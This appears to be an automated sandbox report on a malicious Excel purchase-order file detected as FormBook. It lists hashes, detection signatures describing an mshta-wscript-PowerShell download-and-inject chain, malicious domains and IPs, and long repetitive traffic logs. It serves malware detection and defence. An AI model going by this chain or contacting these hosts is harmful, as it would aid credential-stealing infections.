Windows Analysis Report
PO#BBGR2411PO69.xls

Overview

General Information

Sample name: PO#BBGR2411PO69.xls
Analysis ID: 1566415
MD5: ff6ca372d80251aeadd10122ac4d46c0
SHA1: 26543f78c7c1bfad35c0e3e2acb9d5972cbd1257
SHA256: 8bd6a8555939af5f504e3bcadfa876e1447cadbcbd163b340cd784cafd4dfd8c
Tags: xls, user-abuse_ch

Detection

FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: PO#BBGR2411PO69.xls Virustotal: Detection: 7%
Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Phishing

Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, type: DROPPED
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: 1016.filemail.com
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
